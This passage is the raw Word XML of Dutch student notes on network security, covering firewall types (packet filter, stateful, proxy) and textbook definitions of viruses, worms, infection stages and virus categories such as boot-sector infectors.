        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FFA143" w14:textId="7EDDB8AE" w:rsidR="00A26D74" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C616147" w14:textId="452C5E0D" w:rsidR="00A26D74" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Extra’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769E96A" w14:textId="53D87D90" w:rsidR="00A26D74" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Inhoud filteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220EAB2" w14:textId="00B59320" w:rsidR="00A26D74" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355E16B" w14:textId="53ECD324" w:rsidR="00A26D74" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D9F084" w14:textId="51C86281" w:rsidR="00A26D74" w:rsidRDefault="00A26D74" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CF38E" w14:textId="1E777EC4" w:rsidR="00A26D74" w:rsidRDefault="00F67772" w:rsidP="00A26D74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>3 soorten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C084F" w14:textId="24F27F42" w:rsidR="00F67772" w:rsidRPr="00972A6D" w:rsidRDefault="00E43BD1" w:rsidP="00F67772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972A6D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidR="00214D6D" w:rsidRPr="00972A6D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946E44A" w14:textId="7C75F66D" w:rsidR="00F67772" w:rsidRDefault="00F67772" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L4 OSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1408C" w14:textId="79ADEE0F" w:rsidR="00F67772" w:rsidRDefault="00F67772" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cisco Routers bv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCEFD33" w14:textId="389C2FB8" w:rsidR="00AE7C6E" w:rsidRDefault="00AE7C6E" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Makkelijk te implementeren, men heeft meestal een router klaar staan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED47BBE" w14:textId="4AED3159" w:rsidR="00AE7C6E" w:rsidRDefault="00AE7C6E" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nadelen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF7DE2" w14:textId="68769FFD" w:rsidR="00AE7C6E" w:rsidRDefault="00AE7C6E" w:rsidP="00AE7C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Niet voorbereid op DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B12E7" w14:textId="0E656844" w:rsidR="00AE7C6E" w:rsidRDefault="00AE7C6E" w:rsidP="00AE7C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Geen sessies bijhouden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376C4B6" w14:textId="635DACA0" w:rsidR="00AE7C6E" w:rsidRDefault="00AE7C6E" w:rsidP="00AE7C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Grote ACLs zorgen voor extra belasting op het netwerk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD8152D" w14:textId="1357BE79" w:rsidR="00E43BD1" w:rsidRDefault="00E43BD1" w:rsidP="00AE7C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Poorten boven 1024 moeten open laten staan (geen goed idee)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C19CED" w14:textId="6880A1FC" w:rsidR="00F67772" w:rsidRPr="00972A6D" w:rsidRDefault="00F67772" w:rsidP="00F67772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972A6D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Stateful packetfilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2092BDF9" w14:textId="6E3DDA26" w:rsidR="00F67772" w:rsidRDefault="00F67772" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L5 OSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3574C6" w14:textId="26B82D20" w:rsidR="00390499" w:rsidRDefault="00390499" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Packetingfilter + Sessies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD8D72" w14:textId="7F8407CC" w:rsidR="00390499" w:rsidRDefault="00390499" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Voorbereid op DOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD817D" w14:textId="7C893CE1" w:rsidR="00E43BD1" w:rsidRDefault="00E43BD1" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kijkt niet alleen naar pakketten, maar ook de context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBD91A5" w14:textId="29CD9BA0" w:rsidR="00E43BD1" w:rsidRDefault="00E43BD1" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Poorten boven 1024 DICHT, enkel OPEN indien het nodig is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54482199" w14:textId="607D17E0" w:rsidR="00F67772" w:rsidRPr="00972A6D" w:rsidRDefault="00F67772" w:rsidP="00F67772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972A6D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D4C82" w14:textId="29138375" w:rsidR="00F67772" w:rsidRDefault="00F67772" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L7 OSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1420FBF7" w14:textId="506EDF50" w:rsidR="00E07E96" w:rsidRDefault="00E07E96" w:rsidP="00F67772">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Controleert nog eens extra op de Applicatielaag, maar is ook trager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A09E7EF" w14:textId="77777777" w:rsidR="00F67772" w:rsidRDefault="00F67772" w:rsidP="00E43BD1"/>
    <w:p w14:paraId="3B6E7ED3" w14:textId="57E45621" w:rsidR="00E03C64" w:rsidRDefault="00E43BD1" w:rsidP="00E43BD1">
      <w:r>
        <w:t xml:space="preserve">Tussen een Packetfilter Firewall en een Statful Packetfilter Firewall is het grootste verschil dat </w:t>
      </w:r>
      <w:r w:rsidR="00ED574C">
        <w:t xml:space="preserve">binnenkomend verkeer op </w:t>
      </w:r>
      <w:r>
        <w:t>poorten boven 1024</w:t>
      </w:r>
      <w:r w:rsidR="00ED574C">
        <w:t xml:space="preserve"> toegelaten wordt (antwoord op request).</w:t>
      </w:r>
      <w:r w:rsidR="00196F36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED574C">
        <w:t>Een Stateful packetfilter houdt de sessie bij en checkt de socketinfo om te kijken of het verkeerd binnen mag of niet.</w:t>
      </w:r>
      <w:r w:rsidR="00196F36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007360CF">
        <w:t>Firewalls met een hogere beveiliging hebben meestal minder functionaliteit, ze geven ook een vals gevoel van veiligheid (zorg voor Layered Defense).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEA69A9" w14:textId="2BF42794" w:rsidR="007360CF" w:rsidRDefault="00E03C64" w:rsidP="00D51CFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="14" w:name="_Toc453378503"/>
      <w:r w:rsidR="00D51CFF">
        <w:lastRenderedPageBreak/>
        <w:t>Virus/Worm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="509F2857" w14:textId="77777777" w:rsidR="00D51CFF" w:rsidRDefault="00D51CFF" w:rsidP="00D51CFF"/>
    <w:p w14:paraId="0BFEFFB8" w14:textId="50A4F7DB" w:rsidR="00756B89" w:rsidRDefault="00756B89" w:rsidP="00756B89">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF4CA3B" w14:textId="77777777" w:rsidR="00756B89" w:rsidRDefault="00756B89" w:rsidP="00D51CFF"/>
    <w:p w14:paraId="04DB67B4" w14:textId="6BF6FDDF" w:rsidR="00D51CFF" w:rsidRDefault="00756B89" w:rsidP="00756B89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>VIRUS = Programma dat zich kopieert door andere programma’s te infecteren!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C930ADA" w14:textId="259550EB" w:rsidR="00756B89" w:rsidRDefault="00756B89" w:rsidP="00756B89">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VIRUS = </w:t>
      </w:r>
      <w:r w:rsidRPr="00D175BE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>replicatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44989F79" w14:textId="77777777" w:rsidR="00756B89" w:rsidRDefault="00756B89" w:rsidP="00756B89"/>
    <w:p w14:paraId="53D2510E" w14:textId="49651316" w:rsidR="00756B89" w:rsidRDefault="00756B89" w:rsidP="00756B89">
      <w:r>
        <w:t xml:space="preserve">Het </w:t>
      </w:r>
      <w:r w:rsidR="001759F9">
        <w:t>infecteren zelf is het zich hechten aan 1 of meerdere programma’s. Dit kan door het programma zelf op te starten, maar soms kan booten al genoeg zijn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0388FEDA" w14:textId="77777777" w:rsidR="00892372" w:rsidRDefault="00892372" w:rsidP="00756B89"/>
    <w:p w14:paraId="39A59E4E" w14:textId="21B6D727" w:rsidR="00892372" w:rsidRDefault="00892372" w:rsidP="00892372">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E68AB36" w14:textId="77777777" w:rsidR="00892372" w:rsidRDefault="00892372" w:rsidP="00892372"/>
    <w:p w14:paraId="107D31BA" w14:textId="4DD24D35" w:rsidR="00892372" w:rsidRDefault="00892372" w:rsidP="00892372">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hecht zich </w:t>
      </w:r>
      <w:r w:rsidRPr="00892372">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NIET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>aan een programma, maar infecteert zijn omgeving door zich via het netwerk te verspreiden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E571520" w14:textId="733EC62C" w:rsidR="00892372" w:rsidRDefault="00892372" w:rsidP="00892372">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Er is dus ook meestal </w:t>
      </w:r>
      <w:r w:rsidRPr="00D175BE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>geen user interaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00D175BE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>nodig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47119745" w14:textId="08E51EF1" w:rsidR="00BD3C37" w:rsidRDefault="00BD3C37" w:rsidP="00892372">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verspreidt zich sneller dan een virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234CBD06" w14:textId="77777777" w:rsidR="00E24FB2" w:rsidRDefault="00E24FB2" w:rsidP="00E24FB2"/>
    <w:p w14:paraId="52DF7278" w14:textId="6A2EB8CF" w:rsidR="00E24FB2" w:rsidRDefault="00E24FB2" w:rsidP="00E24FB2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>In The Wild</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D74DCCE" w14:textId="77777777" w:rsidR="00E24FB2" w:rsidRDefault="00E24FB2" w:rsidP="00E24FB2"/>
    <w:p w14:paraId="27478B20" w14:textId="09FAC318" w:rsidR="00E24FB2" w:rsidRDefault="00E24FB2" w:rsidP="00E24FB2">
      <w:r>
        <w:t>Een virus dat “in the wild” is, is wanneer het grote publiek er mee te krijgen en niet enkel de onderzoekers in een afgesloten labo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27F3D5" w14:textId="77777777" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00E24FB2"/>
    <w:p w14:paraId="09C1E2F0" w14:textId="1E6F9317" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00E24FB2">
      <w:r>
        <w:t>De WildList Organisation (</w:t>
      </w:r>
      <w:r w:rsidRPr="003A3E67">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>WLO</w:t>
      </w:r>
      <w:r>
        <w:t>) houdt bij welke virussen in circulatie zijn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BB946" w14:textId="4D742518" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Virussen in the wild = +/- paar honderd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE3D58" w14:textId="0EAE926A" w:rsidR="00370634" w:rsidRPr="00E24FB2" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Virussen dat bestaat = 70.000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3059E309" w14:textId="77777777" w:rsidR="00FE4BD1" w:rsidRDefault="00FE4BD1" w:rsidP="00D51CFF"/>
    <w:p w14:paraId="3CBD9D63" w14:textId="654C049D" w:rsidR="00756B89" w:rsidRDefault="00FE4BD1" w:rsidP="00812ACB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Werking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3953AD" w14:textId="77777777" w:rsidR="00FE4BD1" w:rsidRDefault="00FE4BD1" w:rsidP="00D51CFF"/>
    <w:p w14:paraId="5F9078EE" w14:textId="5C1E6EEC" w:rsidR="00756B89" w:rsidRDefault="00370634" w:rsidP="00D51CFF">
      <w:r>
        <w:t>Een virus heeft enkele basisstappen in de programmatie zitten:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D3386" w14:textId="38AD64C8" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Infection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A8E6DD" w14:textId="73926AA7" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0024D8" w14:textId="055F4FB3" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53126FFE" w14:textId="77777777" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634"/>
    <w:p w14:paraId="2BF2B662" w14:textId="7424A378" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:r>
        <w:t>Ze kunnen ook ingedeeld worden in enkele categorieën</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194BA8B8" w14:textId="24195A38" w:rsidR="00370634" w:rsidRPr="00F8216A" w:rsidRDefault="005470A7" w:rsidP="00370634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Boots</w:t>
      </w:r>
      <w:r w:rsidR="00370634" w:rsidRPr="00F8216A">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ector Infectors (BSI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF056C" w14:textId="0D64DF37" w:rsidR="00710AAC" w:rsidRDefault="00710AAC" w:rsidP="00710AAC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bootsector bevat info over de bestandsstructuur</w:t>
      </w:r>
      <w:r w:rsidR="00B4706C">
        <w:t xml:space="preserve"> + info om te booten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57662F29" w14:textId="11E78376" w:rsidR="00B4706C" w:rsidRDefault="00B4706C" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Master Boot Record</w:t>
      </w:r>
      <w:r w:rsidR="00D4358B">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="0056251A">
        <w:t>Bevat info over de HDD en l</w:t>
      </w:r>
      <w:r>
        <w:t>aadt de Volume Boot Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EA515C" w14:textId="4A5C5932" w:rsidR="00B4706C" w:rsidRDefault="00B4706C" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Volume Boot Record</w:t>
      </w:r>
      <w:r w:rsidR="00D4358B">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:t>Eerste sector van een storage device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA89207" w14:textId="78C735B8" w:rsidR="006A413D" w:rsidRDefault="005470A7" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een BSI vervangt de boot</w:t>
      </w:r>
      <w:r w:rsidR="000D4D41">
        <w:t>sector met zijn eigen versie, infecteert bij gevolg bv alle USB sticks die nadien gebruikt worden.</w:t>
      </w:r>
      <w:r w:rsidR="0056251A">
        <w:t xml:space="preserve"> Hij </w:t>
      </w:r>
      <w:r>
        <w:t>kopieert de originele boot</w:t>
      </w:r>
      <w:r w:rsidR="006A413D">
        <w:t>sector meestal naar een andere plaats = werking niet verstoord</w:t>
      </w:r>
      <w:r w:rsidR="002B6716">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA02FA6" w14:textId="3A01C459" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Virussen die een bestand infecteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D891C" w14:textId="6C51F7B4" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Multivirussen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D6679D" w14:textId="4099F9DD" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Macrovirussen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F98B665" w14:textId="77F57153" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scriptvirussen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E135D76" w14:textId="1E0967ED" w:rsidR="00370634" w:rsidRDefault="00370634" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8216A">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Memetische</w:t>
      </w:r>
      <w:r w:rsidRPr="00F8216A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>virussen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF170E5" w14:textId="6B683389" w:rsidR="002B6716" w:rsidRDefault="002B6716" w:rsidP="002B6716">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Virussen zonder code = Hoax</w:t>
      </w:r>
      <w:r w:rsidR="00CD2472">
        <w:t xml:space="preserve"> = Kettingbrieven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176FEE61" w14:textId="3C18CCF1" w:rsidR="005173FE" w:rsidRDefault="005173FE" w:rsidP="00370634">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wormen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B07A3D" w14:textId="77777777" w:rsidR="004537B6" w:rsidRDefault="004537B6" w:rsidP="004537B6"/>
    <w:p w14:paraId="772B5429" w14:textId="67DACC82" w:rsidR="00C0433C" w:rsidRDefault="004537B6" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Virussen zijn stiekem/stealth en proberen hun aanwezigheid te verbergen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E763FED" w14:textId="77777777" w:rsidR="00332F0F" w:rsidRDefault="0056251A" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00332F0F">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Payloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00332F0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>worden meestal met vertraging uitgevoerd nadat het virus getriggerd is.</w:t>
      </w:r>
    </w:p>
